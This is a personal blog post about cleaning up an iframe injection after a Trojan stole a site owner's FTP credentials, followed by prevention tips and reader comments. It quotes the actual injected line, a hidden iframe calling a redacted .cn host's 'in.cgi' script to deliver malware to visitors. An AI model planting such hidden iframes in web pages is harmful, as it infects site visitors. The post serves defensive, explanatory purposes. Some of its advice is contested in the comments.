How to solve an iframe injection caused by Trojan malware
By probyte2u
What is <IFRAME>?
The <iframe> tag defines an inline frame that contains another document. We use <iframe> tag to include another document in inside website document.
For example, I use the following iframe code to insert Salesforce.com content syndicate inside my website. Please refer to the image below.
<iframe id="blockrandom"
name="iframe" src="http://probyte2u.com/salesforce.html"
width="100%"
height="1300"
scrolling="auto"
align="top"
frameborder="0"
class="wrapper">
This option will not work correctly. Unfortunately, your browser does not support inline frames.
</iframe>
Basically now you have some rough idea about <IFRAME> and it's usage !
Now what does IFRAME injection means ?
Iframe injections means attackers or hackers insert their iframe codes inside your website page. They use Trojan malware to do it.
Normally their will target your index.html, index.php, default.php or configuration.php page.
They will insert their codes inside your website, so when visitors visit your page they will download their malicious code inside your personal computer in order to replicate the process and also to retrieve financial and identification details of the visitor.
Their main purpose is for financial gain and some of them use it for their political purpose. They can also infect a lot of pc and use it to launch Distributed Denial of Service (DDoS) attack against their target.
From my own personal experience, I first encounter this problem when I tried to access my website and got the following error.
Parse error: syntax error, unexpected '/' in /home/+++++/public_html/index.php on line 85
So I checked in the index.php file and found the following code inserted inside the index.php file.
The iframe injection was not properly done, with additional "/" symbol at the start of the iframe injection as shown below, it was detected and the website coding does not download malicious code.
/
<iframe src="http://{URL HAS BEEN REMOVED}.cn:8080/ts/in.cgi?pepsi49" width=125 height=125 style="visibility: hidden"></iframe>
If the iframe injection was done properly, then all the visitors that visit the infected site will most probably get infected with malicious malware.
Sample of Mozilla Warning for Reported Attack Site shown below.
So what i did was that I removed the iframe injection from the infected file and upload the new files. Plus, I change ftp details for the website.
My site was safe for few days, unfortanely the same problem occurs after a while. I was suspucios how the hacker able to access my website.
So I checked with my hosting provider how my website was hacked.
Then only I knew that my personal computer was most probably infected by Trojan virus and the hacker has automated the whole process.
The Trojan virus managed to steal all my websites username and password that was saved in the file transfer protocal software that I used. All the websites that I used using the ftp software was infected with the iframe injection.
Luckily, I got back up files for my website that was not infected.
Since a lot of the files has been infected, I had no other choise but to restore the entire site using the backup file. I changed my ftp username and password.
To prevent the problem from recurring I install Kaspersky Internet Security and but the problem still happen back. (See my latest update below)
I still have not figure out the root cause, so the potential for it to happen back is there !
If your problem is not as serious as mine.
Then you could resolve the problem using the steps below.
How to eliminate this problem
Use Kapersky Antivirus paid version , update the pattern and scan your computer. Clean all infected files in your computer.
How to clean the infected php or html pages in my web site?
1. Refer to Google badaware notice like this
Approximately 6 files have been injected. You can search your index.php, index.html for the lines of codes.
You can also download copies of your public_html if the injected files are too many (zip the public_html or folder by folders. Uncompress the zip file on your desktop. Kapersky will notify you the injected files. Do not clean the files. Just save the log file so you can edit manually. Using this method, your page will not be destroyed or altered by Kapersky.
2. Change your FTP/Cpanel Login information. Avoid using the same password for web registration. Your FTP password should not be recycled. Some fake web sites would harvest this information and perform iframe injection over the web.
3. Sort your files by dates in FTP window. You can check the latest edited pages (or infection date) for injected codes.
4. You can revert to public_html backup – this method is not advisable and should be used as last resort if you could not find the infected pages. If your pages have been infected for more than a month, most probably your backup files also contain the injected codes.
5. Plus remember NOT to safe the username and password of your website inside your file transfer protocal software. From my own experience, the Trojan virus managed to steal the information from the ftp software.
Latest Update
They have injected my site again! (Happened in July 2009)
Problem started when I access my site to upload file to my site. Before that, there was no problem.
Look like I need to iron out the loop holes.
Managed two get my sites back !
I am not very sure, how they did it !
But, I have done some precautionary measure, to prevent it from happening back !
- I always back up my website content, even before there was any problem. I would recommend you to do so. If your files got infected, you can solve your problem very fast.
- Always change your cpanel / ftp password after you have uploaded your content to your site.
- Don't simply upload content via ftp. Because, my problem always start when I ftp the content.
- Don't keep your password and username in your ftp software.
- Always scan your PC with paid antivirus, to detect any virus.
- I am using Google Chrome incognito web browser, to access my cpanel and ftp. I am not this can solve it or not, let me check and see whether it works or not.
- Don't install lot of unnecessary plugins / modules / components in your content management system website, it takes a lot of effort to clean up. I am waiting for the latest update to clean up all the corrupted files.
- I asked Kaspesky Lab Support to analyze my personal computer details to check whether there is any virus still resides in my pc. Luckily they didn't found any trace of virus. Please refer to the link below for correspondence between me and Kaspersky Lab.
- Kaspersky Lab Technical Support Service to Help Detect Virus and Trojan
Still save till now, it's been more than 1 month after writing this article. Hopefully problem will not reoccur !
Interesting Articles
- Interesting & Funny Press Release from NagaDDB
Interesting thank you press release by Naga DDB after voted as the Creative Agency of the Year 2009 in a poll conducted by Advertising+Marketing magazine. Have a good day reading the press release. Peace ! ... - How to scan a file for virus without an anti virus software
You just downloaded a file from the Internet but don't have a paid anti virus software to check the file for any virus. One way to check for any virus and be certain that the file is not malicious is to... - How to secure your login to online banking sites with virtual keyboard
Do you think hackers cannot capture your username & password which you use to access your online banking easily? Think again, once your pc has been infected with trojan or worm with capability to capture... - Nigerian Scam Email - Love Letter (Part 2)
Continues from Part 1 Nigerian Scam Email Love Letter After I send a pity letter to her/him. The scammer has already replied back with what next to do. He asked me to keep this transaction Extra... - Another Sample of Nigerian Email Scam - Love Letter
This is a real love letter Nigerian scam email. She is looking for god fearing partner to transfer six million USD. So, they are making better offers right now. Hubbers please don't get duped by spammers !... - GIMP - Image Editing Software (Freeware)
The Gimp is one of the best free open source image editing software. I have been using for my works for few years and has a lot features to edit my images. Once you are familiar with the tools, you could... - How to Issue Refund to your Buyer using Paypal
I will show how to refund back to client in Paypal Sandbox. It is the same process as live paypal site. Before you can refund back. You need to go through the following articles so that you have records of... - Paypal SandBox Sign Up Guide
Paypal SandBox - Put Your Code To The Test Paypal SandBox - Put Your Code To The Test Before you implement your online transactions using Paypal in live site, it is better for you to check the integrity of... - Nigerian Scam Email (Real Sample)
Got a Nigerian scam email today. The email is below with the real email address of the conman. The smart thing about this email is that the conman uses fake name of Governor of the Central Bank of... - How to reset your Gmail password
You think your Gmail account password has been stolen by hackers or just for security sake you want to change your gmail account password, the steps to do it are as follow. Go to Google Gmail Reset Password...
![Norton Internet Security 2012 3User [Download]](http://ecx.images-amazon.com/images/I/51EKq4-lSgL._SL75_.jpg) | Amazon Price: $24.88 List Price: $79.99 |
 | Amazon Price: $15.25 List Price: $79.95 |
![Norton 360 v.6 1User/3PC [Download]](http://ecx.images-amazon.com/images/I/41sE2uQ5ENL._SL75_.jpg) | Amazon Price: $34.99 List Price: $89.99 |
 | Amazon Price: $19.99 List Price: $79.99 |
 | Amazon Price: $10.48 List Price: $39.99 |
Thank you Dan your information and lead. You point out another way to resolve the problem.
Thank you Dan , I am facing the same problem also.
Thanks very uch for your history and help for those we suffer the same problem im now doing some points you describe and i hope this can help my site.
thnaks
Saving passwords usually has nothing to do with stealing. Trojan scans FTP connections and steal passwords from it. It does not matter if you saved it or typed in. Some trojans even log keyboard to steal typed passwords.
What you actually have to do is to find and remove trojan itself, which is hard to do.
HijackThis and Mallwarebyte's Anti-Mallware may help.
Hi Pedja, thank you for stopping by and for the comment.
But my infection, the trojan got the password from the ftp software which I use.
There were few sites which I have not access the sites for few month using the ftp software. I didn't initiate any ftp connections for the sites.
I kept the username and password of the sites in the ftp software.
And this variant manage to get the username and password from the ftp software and start injecting the iframe codes in into the sites.
The trojan writer really know the loopholes to do it. I must admit it was quite brilliantly done.
Once my pc got infected, I notice my Internet traffic and cpu usage are always high. This the first symptom of the infection.
Dave comments
"I have the same problems and have to sort it out now.
I have also read elsewhere that ftp passwords are not secure in ftp software so I won't be storing them in my ftp client anymore."
Hi Dave,
I have remove to your website link because your site got virus infection. My Kasperksy just alerted the problem.
Thanks your post.
The same issue for my websites.
If you’re on a VPS/dedicated hosting grab yourself a copy of Upload Guardian - http://www.serverprogress.com/upload_guardian.php It scans for iframe injections and other malicious tools hackers use to modify your pages. The scanning is done on file in real-time via FTP/PHP and will block the attacker at the firewall and can send email alerts.
Hi Steve, thanks for the information. Very useful solution for web hosting company.
Thanks, you tought me a lot of things that I did not know before. Great hub!
Hi 07Angel01, thanks for the visit.
Im probably just paranoid but now I gotta go check a few index.php files. Good Info, thanks for the post.
Dan 2 years ago
URL below provides a solution to this trojan
http://www.qualitycodes.com/tutorial.php?articleid